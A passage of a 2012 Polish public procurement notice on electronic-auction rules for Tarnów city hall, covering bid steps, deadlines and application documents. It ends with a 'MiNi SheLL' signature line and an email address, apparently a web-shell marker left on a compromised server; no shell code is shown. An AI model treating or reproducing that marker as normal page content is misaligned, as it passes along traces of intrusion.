IV.4.8.2) Korzystanie z oprogramowania jest bezpłatne. Jedynym warunkiem jest zarejestrowanie się w systemie.
 
IV.4.8.3) Przed rozpoczęciem korzystania z platformy zaleca się zapoznanie się z Samouczkiem, oraz z wersją demonstracyjną platformy, zamieszczonymi na stronie internetowej, na której będzie prowadzona licytacja elektroniczna.
 
IV.4.8.4) Pomoc techniczną w zakresie funkcjonowania systemu (zgłaszanie ew. błędów) można uzyskać po numerem telefonu (22) 632 28 84.
 
IV.4.8.5) Udział w licytacji elektronicznej wymaga dysponowania komputerem PC z systemem operacyjnym Windows/Linux oraz przeglądarką internetową Internet Explorer 6.0 lub wyższą lub Firefox 2.0 lub wyższą.
 
IV.4.8.6) Zamawiający dopuści do udziału w licytacji elektronicznej i zaprosi do składania ofert wszystkich wykonawców, którzy spełnią warunki udziału w postępowaniu, określając w zaproszeniu termin związania ofertą wykonawcy (30 dni), który zaoferuje najniższą cenę..</p>
<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> IV.4.9.1) Po zalogowaniu się na platformie, Wykonawcy uzyskują dostęp do aplikacji umożliwiającej składanie ofert. W czasie trwania licytacji (od otwarcia licytacji do jej zamknięcia) Wykonawcy składają swoje oferty cenowe w postaci elektronicznej.
 
IV.4.9.2) Zamawiający i wykonawcy od momentu otwarcia do momentu zamknięcia licytacji przekazują wnioski, oświadczenia i inne informacje drogą elektroniczną.
 
IV.4.9.3) Oferty składane przez Wykonawców podlegają automatycznej klasyfikacji na podstawie ceny. System umożliwia składanie wyłącznie ofert o cenie niższej niż oferta wiodąca w danym momencie. Oferta złożona w toku licytacji przestaje wiązać, gdy inny Wykonawca złożył ofertę korzystniejszą. 

IV.4.9.4) W trakcie licytacji elektronicznej system na bieżąco udostępnia wszystkim Wykonawcom informacje o pozycji złożonych przez nich ofert, liczbie Wykonawców biorących udział w licytacji elektronicznej, oraz cenach złożonych przez nich ofert, z tym że do momentu zamknięcia licytacji elektronicznej nie ujawnia się informacji umożliwiających identyfikację wykonawców. 

IV.4.9.5.) Cena wywoławcza: 54 000.00 zł (brutto). 

IV.4.9.6) Minimalny krok postąpienia: 300.00 zł (brutto). System nie przyjmie postąpienia, którego wysokość jest mniejsza od określonego minimalnego postąpienia. Wysokość postąpienia jest liczona w odniesieniu do najkorzystniejszej oferty złożonej w danej licytacji.
 
IV.4.9.7) System dopuszcza składanie postąpień z dokładnością do jednego grosza. Wartość groszy należy wpisywać po kropce..</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> 1 godzina</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 17.01.2012 godzina 10:00, miejsce: Urząd Miasta Tarnowa, Kancelaria Główna, 33-100 Tarnów, ul. Nowa 4, pok. 1A.</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> 5 dni po terminie przekazania zaproszeń,
o godzinie 12:00..</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>1) Zamknięcie licytacji elektronicznej nastąpi 1 godzinę po otwarciu licytacji.
UWAGA:
Czas, o którym mowa w pkt IV.4.13) odnosi się do czasu serwera podawanego na stronie licytacje.uzp.gov.pl</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Nie dotyczy</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Wzór umowy stanowi załącznik nr 4 do ogłoszenia, zamieszczony na stronie http://portal.tarnow.bip-gov.info.pl/bip/</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> IV.4.16.1) Osoba uprawniona przez Zamawiającego do kontaktu z wykonawcami: 
Danuta Warzyca, tel. 14/6882-449.

IV.4.16.2) Opis sposobu sporządzenia wniosku i forma dokumentów.
a)	Wniosek o dopuszczenie do udziału w licytacji należy sporządzić w formie pisemnej w języku polskim - wg wzoru stanowiącego załącznik nr 2 do ogłoszenia.
b)	Wniosek o dopuszczenie do udziału w licytacji oraz oświadczenia (opisane w pkt. III.4.1) i pkt III.4.2) - według wzorów określonych w załącznikach nr 2, 3 i 5 do ogłoszenia) mają być podpisane przez osobę/osoby upoważnione do reprezentowania wykonawcy. W przypadku, gdy uprawnienie do podpisania wniosku i oświadczenia nie wynika z dokumentu, o którym mowa w pkt III.4.2) do oferty należy załączyć stosowne upoważnienie (pełnomocnictwo). Pełnomocnictwo musi być przedłożone w formie oryginału lub kopii poświadczonej notarialnie. Pełnomocnictwo w sposób jednoznaczny ma określać do jakich czynności upoważniona jest osoba.
c)	Do wniosku o dopuszczenie do udziału w licytacji należy dołączyć dokumenty 
i oświadczenia, o których mowa w pkt III. 4.1), pkt III.4.2), z zastrzeżeniem pkt III.4.3) i pkt. III.6).
d)	Dokumenty wymienione w pkt. III.4.2) i pkt. III.4.3) mają być przedstawione w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. 
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, kopie dokumentów dotyczących odpowiednio wykonawców lub tych podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.
e)	Dokumenty sporządzone w języku obcym są składane z tłumaczeniem na język polski. 

IV.4.16.3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (konsorcjum).
a) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (konsorcjum) są zobowiązani ustanowić Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy.
b) Konsorcjum składa jeden wniosek o dopuszczenie do udziału, przy czym wymagane dokumenty wskazane w pkt. III.4.2) składa każdy z uczestników konsorcjum. 
c) Oświadczenia, o których mowa w pkt III.4.1) i pkt III.4.2) powinny być złożone z uwzględnieniem treści art. 23 ust. 3 Pzp i podpisane przez Wykonawcę lub osobę upoważnioną do jego reprezentowania..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com